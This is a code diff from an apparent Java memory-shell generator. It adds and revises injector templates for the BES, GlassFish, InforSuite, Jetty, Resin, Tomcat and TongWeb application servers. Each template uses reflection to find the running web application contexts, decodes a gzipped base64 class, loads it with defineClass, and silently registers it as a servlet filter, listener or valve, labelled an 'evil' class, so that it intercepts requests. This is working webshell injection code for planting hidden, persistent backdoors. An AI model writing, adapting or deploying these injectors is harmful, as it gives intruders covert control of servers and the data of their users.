throw new RuntimeException(e.getMessage());
}
} else {
try {
return method.invoke(obj, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
}
}
}
@@ -0,0 +1,220 @@
package jmg.core.template;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.zip.GZIPInputStream;
public class BESListenerInjectorTpl {
public String getClassName() {
return "";
}
public String getBase64String() throws IOException {
return "";
}
static {
new BESListenerInjectorTpl();
}
public BESListenerInjectorTpl() {
try {
List<Object> contexts = getContext();
for (Object context : contexts) {
Object listener = getListener(context);
addListener(context, listener);
}
} catch (Exception ignored) {
}
}
public List<Object> getContext() throws IllegalAccessException, NoSuchMethodException, InvocationTargetException {
List<Object> contexts = new ArrayList();
Thread[] threads = getThreads();
try {
for (Thread thread : threads) {
if (thread.getName().contains("ContainerBackgroundProcessor")) {
HashMap childrenMap = (HashMap) getFV(getFV(getFV(thread, "target"), "this$0"), "children");
for (Object key : childrenMap.keySet()) {
HashMap children = (HashMap) getFV(childrenMap.get(key), "children");
for (Object key1 : children.keySet()) {
Object context = children.get(key1);
if (context != null) contexts.add(context);
}
}
}
}
} catch (Exception ignored) {
}
return contexts;
}
public Thread[] getThreads() {
Thread[] var0 = null;
try {
var0 = (Thread[]) (invokeMethod(Thread.class, "getThreads"));
} catch (NoSuchMethodException | InvocationTargetException | IllegalAccessException var3) {
ThreadGroup var2 = Thread.currentThread().getThreadGroup();
var0 = new Thread[var2.activeCount()];
var2.enumerate(var0);
}
return var0;
}
private ClassLoader getWebAppClassLoader(Object context) throws Exception {
try {
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
} catch (Exception e) {
Object loader = invokeMethod(context, "getLoader", null, null);
return ((ClassLoader) invokeMethod(loader, "getClassLoader", null, null));
}
}
private Object getListener(Object context) throws Exception {
Object listener = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try {
listener = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) {
try {
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class clazz = (Class) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
listener = clazz.newInstance();
} catch (Exception ignored) {
}
}
return listener;
}
public void addListener(Object context, Object listener) throws Exception {
if (isInjected(context, listener.getClass().getName())) {
return;
}
try {
invokeMethod(context, "addApplicationEventListener", new Class[]{Object.class}, new Object[]{listener});
} catch (Exception e) {
Object[] objects = (Object[]) invokeMethod(context, "getApplicationEventListeners", new Class[0], new Object[0]);
List listeners = Arrays.asList(objects);
ArrayList arrayList = new ArrayList(listeners);
arrayList.add(listener);
invokeMethod(context, "setApplicationEventListeners", new Class[]{Object[].class}, new Object[]{(Object) arrayList.toArray()});
}
}
public boolean isInjected(Object context, String evilClassName) throws Exception {
Object[] objects = (Object[]) invokeMethod(context, "getApplicationEventListeners", new Class[0], new Object[0]);
List listeners = Arrays.asList(objects);
ArrayList arrayList = new ArrayList(listeners);
for (int i = 0; i < arrayList.size(); i++) {
if (arrayList.get(i).getClass().getName().contains(evilClassName)) {
return true;
}
}
return false;
}
static byte[] decodeBase64(String base64Str) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class<?> decoderClass;
try {
decoderClass = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
} catch (Exception ignored) {
decoderClass = Class.forName("java.util.Base64");
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
}
}
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
ByteArrayOutputStream out = new ByteArrayOutputStream();
ByteArrayInputStream in = new ByteArrayInputStream(compressedData);
GZIPInputStream ungzip = new GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = ungzip.read(buffer)) >= 0) {
out.write(buffer, 0, n);
}
return out.toByteArray();
}
static Object getFV(Object obj, String fieldName) throws Exception {
Field field = getF(obj, fieldName);
field.setAccessible(true);
return field.get(obj);
}
static Field getF(Object obj, String fieldName) throws NoSuchFieldException {
Class<?> clazz = obj.getClass();
while (clazz != null) {
try {
Field field = clazz.getDeclaredField(fieldName);
field.setAccessible(true);
return field;
} catch (NoSuchFieldException e) {
clazz = clazz.getSuperclass();
}
}
throw new NoSuchFieldException(fieldName);
}
static synchronized Object invokeMethod(Object targetObject, String methodName) throws NoSuchMethodException, IllegalAccessException, InvocationTargetException {
return invokeMethod(targetObject, methodName, new Class[0], new Object[0]);
}
public static synchronized Object invokeMethod(final Object obj, final String methodName, Class[] paramClazz, Object[] param) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class clazz = (obj instanceof Class) ? (Class) obj : obj.getClass();
Method method = null;
Class tempClass = clazz;
while (method == null && tempClass != null) {
try {
if (paramClazz == null) {
// Get all declared methods of the class
Method[] methods = tempClass.getDeclaredMethods();
for (int i = 0; i < methods.length; i++) {
if (methods[i].getName().equals(methodName) && methods[i].getParameterTypes().length == 0) {
method = methods[i];
break;
}
}
} else {
method = tempClass.getDeclaredMethod(methodName, paramClazz);
}
} catch (NoSuchMethodException e) {
tempClass = tempClass.getSuperclass();
}
}
if (method == null) {
throw new NoSuchMethodException(methodName);
}
method.setAccessible(true);
if (obj instanceof Class) {
try {
return method.invoke(null, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
} else {
try {
return method.invoke(obj, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
}
}
}
@@ -64,12 +64,18 @@ public class GlassFishFilterInjectorTpl {
return contexts; return contexts;
} }
private ClassLoader getWebAppClassLoader(Object context) throws Exception {
try {
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
} catch (Exception e) {
Object loader = invokeMethod(context, "getLoader", null, null);
return ((ClassLoader) invokeMethod(loader, "getClassLoader", null, null));
}
}
private Object getFilter(Object context) throws Exception { private Object getFilter(Object context) throws Exception {
Object filter = null; Object filter = null;
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); ClassLoader classLoader = getWebAppClassLoader(context);
if (classLoader == null) {
classLoader = context.getClass().getClassLoader();
}
try { try {
filter = classLoader.loadClass(getClassName()).newInstance(); filter = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -60,13 +60,18 @@ public class GlassFishListenerInjectorTpl {
return contexts; return contexts;
} }
private Object getListener(Object context) throws Exception { private ClassLoader getWebAppClassLoader(Object context) throws Exception {
Object listener = null; try {
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
if (classLoader == null) { } catch (Exception e) {
classLoader = context.getClass().getClassLoader(); Object loader = invokeMethod(context, "getLoader", null, null);
return ((ClassLoader) invokeMethod(loader, "getClassLoader", null, null));
}
} }
private Object getListener(Object context) throws Exception {
Object listener = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try { try {
listener = classLoader.loadClass(getClassName()).newInstance(); listener = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -0,0 +1,223 @@
package jmg.core.template;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.zip.GZIPInputStream;
public class InforSuiteFilterInjectorTpl {
public String getUrlPattern() {
return "/*";
}
public String getClassName() {
return "";
}
public String getBase64String() throws IOException {
return "";
}
static {
new InforSuiteFilterInjectorTpl();
}
public InforSuiteFilterInjectorTpl() {
try {
List<Object> contexts = getContext();
for (Object context : contexts) {
Object filter = getFilter(context);
addFilter(context, filter);
}
} catch (Exception ignored) {
}
}
public List<Object> getContext() throws IllegalAccessException, NoSuchMethodException, InvocationTargetException {
List<Object> contexts = new ArrayList();
Thread[] threads = getThreads();
try {
for (Thread thread : threads) {
if (thread.getName().contains("ContainerBackgroundProcessor")) {
HashMap childrenMap = (HashMap) getFV(getFV(getFV(thread, "target"), "this$0"), "children");
for (Object key : childrenMap.keySet()) {
HashMap children = (HashMap) getFV(childrenMap.get(key), "children");
for (Object key1 : children.keySet()) {
Object context = children.get(key1);
if (context != null) contexts.add(context);
}
}
}
}
} catch (Exception ignored) {
}
return contexts;
}
public Thread[] getThreads(){
Thread[] var0 = null;
try {
var0 = (Thread[])(invokeMethod(Thread.class, "getThreads"));
} catch (NoSuchMethodException | InvocationTargetException | IllegalAccessException var3) {
ThreadGroup var2 = Thread.currentThread().getThreadGroup();
var0 = new Thread[var2.activeCount()];
var2.enumerate(var0);
}
return var0;
}
private Object getFilter(Object context) throws Exception {
ClassLoader classLoader = (ClassLoader) getFV(getFV(context, "loader"), "classLoader");
Object filter = null;
try {
filter = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) {
try {
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class clazz = (Class) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
filter = clazz.newInstance();
} catch (Exception ignored) {
}
}
return filter;
}
public void addFilter(Object context, Object filter) {
String filterName = getSimpleName(getClassName());
try {
Object filterDef = Class.forName("org.apache.catalina.deploy.FilterDef").newInstance();
Object filterMap = Class.forName("org.apache.catalina.deploy.FilterMap").newInstance();
invokeMethod(filterDef, "setFilterName", new Class[]{String.class}, new Object[]{filterName});
invokeMethod(filterDef, "setFilter", new Class[]{Class.forName("javax.servlet.Filter")}, new Object[]{filter});
invokeMethod(filterDef, "setFilterClassName", new Class[]{String.class}, new Object[]{null});
invokeMethod(filterDef, "setFilterClass", new Class[]{Class.class}, new Object[]{filter.getClass()});
invokeMethod(context, "addFilterDef", new Class[]{filterDef.getClass()}, new Object[]{filterDef});
invokeMethod(filterMap, "setFilterName", new Class[]{String.class}, new Object[]{filterName});
invokeMethod(filterMap, "setURLPattern", new Class[]{String.class}, new Object[]{getUrlPattern()});
// org.apache.catalina.core.StandardContext.addFilterMap(org.apache.catalina.deploy.FilterMap, boolean)
invokeMethod(context, "addFilterMap", new Class[]{filterMap.getClass(), boolean.class}, new Object[]{filterMap, false});
Constructor<?>[] constructors = Class.forName("org.apache.catalina.core.ApplicationFilterConfig").getDeclaredConstructors();
constructors[0].setAccessible(true);
Object filterConfig = constructors[0].newInstance(context, filterDef);
Map filterConfigs = (Map) getFV(context, "filterConfigs");
filterConfigs.put(filterName, filterConfig);
} catch (Exception ignored) {
}
}
static byte[] decodeBase64(String base64Str) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class<?> decoderClass;
try {
decoderClass = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
} catch (Exception ignored) {
decoderClass = Class.forName("java.util.Base64");
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
}
}
public static String getSimpleName(String className) {
int lastDotIndex = className.lastIndexOf(".");
if (lastDotIndex != -1 && lastDotIndex < className.length() - 1) {
return className.substring(lastDotIndex + 1);
}
return className;
}
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
ByteArrayOutputStream out = new ByteArrayOutputStream();
ByteArrayInputStream in = new ByteArrayInputStream(compressedData);
GZIPInputStream ungzip = new GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = ungzip.read(buffer)) >= 0) {
out.write(buffer, 0, n);
}
return out.toByteArray();
}
static Object getFV(Object obj, String fieldName) throws Exception {
Field field = getF(obj, fieldName);
field.setAccessible(true);
return field.get(obj);
}
static Field getF(Object obj, String fieldName) throws NoSuchFieldException {
Class<?> clazz = obj.getClass();
while (clazz != null) {
try {
Field field = clazz.getDeclaredField(fieldName);
field.setAccessible(true);
return field;
} catch (NoSuchFieldException e) {
clazz = clazz.getSuperclass();
}
}
throw new NoSuchFieldException(fieldName);
}
static synchronized Object invokeMethod(Object targetObject, String methodName) throws NoSuchMethodException, IllegalAccessException, InvocationTargetException {
return invokeMethod(targetObject, methodName, new Class[0], new Object[0]);
}
public static synchronized Object invokeMethod(final Object obj, final String methodName, Class[] paramClazz, Object[] param) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class clazz = (obj instanceof Class) ? (Class) obj : obj.getClass();
Method method = null;
Class tempClass = clazz;
while (method == null && tempClass != null) {
try {
if (paramClazz == null) {
// Get all declared methods of the class
Method[] methods = tempClass.getDeclaredMethods();
for (int i = 0; i < methods.length; i++) {
if (methods[i].getName().equals(methodName) && methods[i].getParameterTypes().length == 0) {
method = methods[i];
break;
}
}
} else {
method = tempClass.getDeclaredMethod(methodName, paramClazz);
}
} catch (NoSuchMethodException e) {
tempClass = tempClass.getSuperclass();
}
}
if (method == null) {
throw new NoSuchMethodException(methodName);
}
method.setAccessible(true);
if (obj instanceof Class) {
try {
return method.invoke(null, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
} else {
try {
return method.invoke(obj, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
}
}
}
@@ -0,0 +1,194 @@
package jmg.core.template;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.EventListener;
import java.util.HashMap;
import java.util.List;
import java.util.zip.GZIPInputStream;
public class InforSuiteListenerInjectorTpl {
public String getClassName() {
return "";
}
public String getBase64String() throws IOException {
return "";
}
static {
new InforSuiteListenerInjectorTpl();
}
public InforSuiteListenerInjectorTpl() {
try {
List<Object> contexts = getContext();
for (Object context : contexts) {
Object listener = getListener(context);
addListener(context, listener);
}
} catch (Exception ignored) {
}
}
public List<Object> getContext() throws Exception {
List<Object> contexts = new ArrayList();
Thread[] threads = getThreads();
try {
for (Thread thread : threads) {
if (thread.getName().contains("ContainerBackgroundProcessor")) {
HashMap childrenMap = (HashMap) getFV(getFV(getFV(thread, "target"), "this$0"), "children");
for (Object key : childrenMap.keySet()) {
HashMap children = (HashMap) getFV(childrenMap.get(key), "children");
for (Object key1 : children.keySet()) {
Object context = children.get(key1);
if (context != null) contexts.add(context);
}
}
}
}
} catch (Exception ignored) {
}
return contexts;
}
public Thread[] getThreads() throws Exception {
Thread[] var0 = null;
try {
var0 = (Thread[])(invokeMethod(Thread.class, "getThreads"));
} catch (NoSuchMethodException var3) {
ThreadGroup var2 = Thread.currentThread().getThreadGroup();
var0 = new Thread[var2.activeCount()];
var2.enumerate(var0);
}
return var0;
}
private Object getListener(Object context) throws Exception {
ClassLoader classLoader = (ClassLoader) getFV(getFV(context, "loader"), "classLoader");
Object listener = null;
try {
listener = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) {
try {
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class clazz = (Class) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
listener = clazz.newInstance();
} catch (Exception ignored) {
}
}
return listener;
}
public void addListener(Object context, Object listener) throws Exception {
try {
List<EventListener> appEventListeners = (List<EventListener>) invokeMethod(context, "getApplicationEventListeners");
appEventListeners.add((EventListener) listener);
} catch (Exception ignored) {
}
}
static byte[] decodeBase64(String base64Str) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class<?> decoderClass;
try {
decoderClass = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
} catch (Exception ignored) {
decoderClass = Class.forName("java.util.Base64");
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
}
}
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
ByteArrayOutputStream out = new ByteArrayOutputStream();
ByteArrayInputStream in = new ByteArrayInputStream(compressedData);
GZIPInputStream ungzip = new GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = ungzip.read(buffer)) >= 0) {
out.write(buffer, 0, n);
}
return out.toByteArray();
}
static Object getFV(Object obj, String fieldName) throws Exception {
Field field = getF(obj, fieldName);
field.setAccessible(true);
return field.get(obj);
}
static Field getF(Object obj, String fieldName) throws NoSuchFieldException {
Class<?> clazz = obj.getClass();
while (clazz != null) {
try {
Field field = clazz.getDeclaredField(fieldName);
field.setAccessible(true);
return field;
} catch (NoSuchFieldException e) {
clazz = clazz.getSuperclass();
}
}
throw new NoSuchFieldException(fieldName);
}
static synchronized Object invokeMethod(Object targetObject, String methodName) throws NoSuchMethodException, IllegalAccessException, InvocationTargetException {
return invokeMethod(targetObject, methodName, new Class[0], new Object[0]);
}
public static synchronized Object invokeMethod(final Object obj, final String methodName, Class[] paramClazz, Object[] param) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class clazz = (obj instanceof Class) ? (Class) obj : obj.getClass();
Method method = null;
Class tempClass = clazz;
while (method == null && tempClass != null) {
try {
if (paramClazz == null) {
// Get all declared methods of the class
Method[] methods = tempClass.getDeclaredMethods();
for (int i = 0; i < methods.length; i++) {
if (methods[i].getName().equals(methodName) && methods[i].getParameterTypes().length == 0) {
method = methods[i];
break;
}
}
} else {
method = tempClass.getDeclaredMethod(methodName, paramClazz);
}
} catch (NoSuchMethodException e) {
tempClass = tempClass.getSuperclass();
}
}
if (method == null) {
throw new NoSuchMethodException(methodName);
}
method.setAccessible(true);
if (obj instanceof Class) {
try {
return method.invoke(null, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
} else {
try {
return method.invoke(obj, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
}
}
}
@@ -164,14 +164,17 @@ public class JettyFilterInjectorTpl {
throw new Exception("HttpConnection not found"); throw new Exception("HttpConnection not found");
} }
public ClassLoader getWebAppClassLoader(Object context) throws Exception {
private Object getFilter(Object context) { try {
return ((ClassLoader) invokeMethod(context, "getClassLoader"));
Object filter = null; } catch (Exception e) {
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); return ((ClassLoader) getFV(context, "_classLoader"));
if (classLoader == null) {
classLoader = context.getClass().getClassLoader();
} }
}
private Object getFilter(Object context) throws Exception {
Object filter = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try { try {
filter = classLoader.loadClass(getClassName()).newInstance(); filter = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -108,13 +108,17 @@ public class JettyListenerInjectorTpl {
throw new Exception("HttpConnection not found"); throw new Exception("HttpConnection not found");
} }
public ClassLoader getWebAppClassLoader(Object context) throws Exception {
private Object getListener(Object context) { try {
Object listener = null; return ((ClassLoader) invokeMethod(context, "getClassLoader"));
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); } catch (Exception e) {
if (classLoader == null) { return ((ClassLoader) getFV(context, "_classLoader"));
classLoader = context.getClass().getClassLoader();
} }
}
private Object getListener(Object context) throws Exception {
Object listener = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try { try {
listener = classLoader.loadClass(getClassName()).newInstance(); listener = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -57,7 +57,7 @@ public class ResinFilterInjectorTpl {
invokeMethod(filterMappingImpl, "setFilterName", new Class[]{String.class}, new Object[]{getFilterName(filterClassName)}); invokeMethod(filterMappingImpl, "setFilterName", new Class[]{String.class}, new Object[]{getFilterName(filterClassName)});
invokeMethod(filterMappingImpl, "setFilterClass", new Class[]{String.class}, new Object[]{filterClassName}); invokeMethod(filterMappingImpl, "setFilterClass", new Class[]{String.class}, new Object[]{filterClassName});
Object urlPattern = invokeMethod(filterMappingImpl, "createUrlPattern"); Object urlPattern = invokeMethod(filterMappingImpl, "createUrlPattern");
invokeMethod(urlPattern, "addText", new Class[]{String.class}, new Object[]{urlPattern}); invokeMethod(urlPattern, "addText", new Class[]{String.class}, new Object[]{getUrlPattern()});
invokeMethod(urlPattern, "init"); invokeMethod(urlPattern, "init");
invokeMethod(context, "addFilterMapping", new Class[]{filterMappingClass}, new Object[]{filterMappingImpl}); invokeMethod(context, "addFilterMapping", new Class[]{filterMappingClass}, new Object[]{filterMappingImpl});
invokeMethod(context, "clearCache"); invokeMethod(context, "clearCache");
@@ -87,12 +87,17 @@ public class ResinFilterInjectorTpl {
} }
private Object getFilter(Object context) { public ClassLoader getWebAppClassLoader(Object context) throws Exception {
Object filter = null; try {
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
if (classLoader == null) { } catch (Exception e) {
classLoader = context.getClass().getClassLoader(); return ((ClassLoader) getFV(context, "_classLoader"));
} }
}
private Object getFilter(Object context) throws Exception {
Object filter = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try { try {
filter = classLoader.loadClass(getClassName()).newInstance(); filter = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -65,12 +65,17 @@ public class ResinListenerInjectorTpl {
} }
private Object getListener(Object context) { public ClassLoader getWebAppClassLoader(Object context) throws Exception {
Object listener = null; try {
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
if (classLoader == null) { } catch (Exception e) {
classLoader = context.getClass().getClassLoader(); return ((ClassLoader) getFV(context, "_classLoader"));
} }
}
private Object getListener(Object context) throws Exception {
Object listener = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try { try {
listener = classLoader.loadClass(getClassName()).newInstance(); listener = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -95,14 +95,19 @@ public class TomcatFilterInjectorTpl {
return contexts; return contexts;
} }
private ClassLoader getWebAppClassLoader(Object context) throws Exception {
try {
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
} catch (Exception e) {
Object loader = invokeMethod(context, "getLoader", null, null);
return ((ClassLoader) invokeMethod(loader, "getClassLoader", null, null));
}
}
private Object getFilter(Object context) { private Object getFilter(Object context) throws Exception {
Object filter = null; Object filter = null;
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); ClassLoader classLoader = getWebAppClassLoader(context);
if (classLoader == null) {
classLoader = context.getClass().getClassLoader();
}
try { try {
filter = classLoader.loadClass(getClassName()); filter = classLoader.loadClass(getClassName());
} catch (Exception e) { } catch (Exception e) {
@@ -87,13 +87,19 @@ public class TomcatListenerInjectorTpl {
return contexts; return contexts;
} }
private Object getListener(Object context) { private ClassLoader getWebAppClassLoader(Object context) throws Exception {
try {
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
} catch (Exception e) {
Object loader = invokeMethod(context, "getLoader", null, null);
return ((ClassLoader) invokeMethod(loader, "getClassLoader", null, null));
}
}
private Object getListener(Object context) throws Exception {
Object listener = null; Object listener = null;
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); ClassLoader classLoader = getWebAppClassLoader(context);
if (classLoader == null) {
classLoader = context.getClass().getClassLoader();
}
try { try {
listener = classLoader.loadClass(getClassName()).newInstance(); listener = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -95,10 +95,7 @@ public class TomcatValveInjectorTpl {
private Object getValve(Object context) { private Object getValve(Object context) {
Object valve = null; Object valve = null;
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); ClassLoader classLoader = context.getClass().getClassLoader();
if (classLoader == null) {
classLoader = context.getClass().getClassLoader();
}
try { try {
valve = classLoader.loadClass(getClassName()).newInstance(); valve = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -154,7 +151,6 @@ public class TomcatValveInjectorTpl {
public void injectValve(Object context, Object valve) throws Exception { public void injectValve(Object context, Object valve) throws Exception {
if (isInjected(context, valve.getClass().getName())) { if (isInjected(context, valve.getClass().getName())) {
System.out.println(valve.getClass().getName() + "exist, skipping.");
return; return;
} }
try { try {
@@ -0,0 +1,237 @@
package jmg.core.template;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.zip.GZIPInputStream;
/**
* Tongweb Listener 注入器
* Author: pen4uin
* 测试版本:
* v7.0.4.2
*/
public class TongWebListenerInjectorTpl {
public String getClassName() {
return "";
}
public String getBase64String() throws IOException {
return "";
}
static {
new TongWebListenerInjectorTpl();
}
public TongWebListenerInjectorTpl() {
try {
List<Object> contexts = getContext();
for (Object context : contexts) {
Object listener = getListener(context);
addListener(context, listener);
}
} catch (Exception ignored) {
}
}
public List<Object> getContext() throws Exception {
List<Object> contexts = new ArrayList<Object>();
Thread[] threads = getThreads();
Object context = null;
try {
for (Thread thread : threads) {
if (thread.getName().contains("ContainerBackgroundProcessor") && context == null) {
HashMap childrenMap = (HashMap) getFV(getFV(getFV(thread, "target"), "this$0"), "children");
for (Object key : childrenMap.keySet()) {
HashMap children = (HashMap) getFV(childrenMap.get(key), "children");
for (Object key1 : children.keySet()) {
context = children.get(key1);
if (context != null && context.getClass().getName().contains("ThanosStandardContext"))
contexts.add(context);
}
}
}
}
} catch (Exception ignored) {
}
return contexts;
}
public Thread[] getThreads() throws Exception {
Thread[] var0 = null;
try {
var0 = (Thread[])(invokeMethod(Thread.class, "getThreads"));
} catch (NoSuchMethodException var3) {
ThreadGroup var2 = Thread.currentThread().getThreadGroup();
var0 = new Thread[var2.activeCount()];
var2.enumerate(var0);
}
return var0;
}
private ClassLoader getWebAppClassLoader(Object context) throws Exception {
try {
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
} catch (Exception e) {
Object loader = invokeMethod(context, "getLoader", null, null);
return ((ClassLoader) invokeMethod(loader, "getClassLoader", null, null));
}
}
private Object getListener(Object context) throws Exception {
Object listener = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try {
listener = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception ex) {
try {
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class clazz = (Class) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
listener = clazz.newInstance();
} catch (Throwable ignored) {
}
}
return listener;
}
public void addListener(Object context, Object listener) throws Exception {
if (isInjected(context, listener.getClass().getName())) {
return;
}
try {
invokeMethod(context, "addApplicationEventListener", new Class[]{Object.class}, new Object[]{listener});
} catch (Exception ex) {
try {
Object[] objects = (Object[]) invokeMethod(context, "getApplicationEventListeners");
List listeners = Arrays.asList(objects);
ArrayList arrayList = new ArrayList(listeners);
arrayList.add(listener);
invokeMethod(context, "setApplicationEventListeners", new Class[]{Object[].class}, new Object[]{(Object) arrayList.toArray()});
} catch (Exception ignored) {
}
}
}
public boolean isInjected(Object context, String evilClassName) throws Exception {
Object[] objects = (Object[]) invokeMethod(context, "getApplicationEventListeners");
List listeners = Arrays.asList(objects);
ArrayList arrayList = new ArrayList(listeners);
for (int i = 0; i < arrayList.size(); i++) {
if (arrayList.get(i).getClass().getName().contains(evilClassName)) {
return true;
}
}
return false;
}
static byte[] decodeBase64(String base64Str) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class<?> decoderClass;
try {
decoderClass = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
} catch (Exception ignored) {
decoderClass = Class.forName("java.util.Base64");
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
}
}
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
ByteArrayOutputStream out = new ByteArrayOutputStream();
ByteArrayInputStream in = new ByteArrayInputStream(compressedData);
GZIPInputStream ungzip = new GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = ungzip.read(buffer)) >= 0) {
out.write(buffer, 0, n);
}
return out.toByteArray();
}
static Object getFV(Object obj, String fieldName) throws Exception {
Field field = getF(obj, fieldName);
field.setAccessible(true);
return field.get(obj);
}
static Field getF(Object obj, String fieldName) throws NoSuchFieldException {
Class<?> clazz = obj.getClass();
while (clazz != null) {
try {
Field field = clazz.getDeclaredField(fieldName);
field.setAccessible(true);
return field;
} catch (NoSuchFieldException e) {
clazz = clazz.getSuperclass();
}
}
throw new NoSuchFieldException(fieldName);
}
static synchronized Object invokeMethod(Object targetObject, String methodName) throws NoSuchMethodException, IllegalAccessException, InvocationTargetException {
return invokeMethod(targetObject, methodName, new Class[0], new Object[0]);
}
public static synchronized Object invokeMethod(final Object obj, final String methodName, Class[] paramClazz, Object[] param) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class clazz = (obj instanceof Class) ? (Class) obj : obj.getClass();
Method method = null;
Class tempClass = clazz;
while (method == null && tempClass != null) {
try {
if (paramClazz == null) {
// Get all declared methods of the class
Method[] methods = tempClass.getDeclaredMethods();
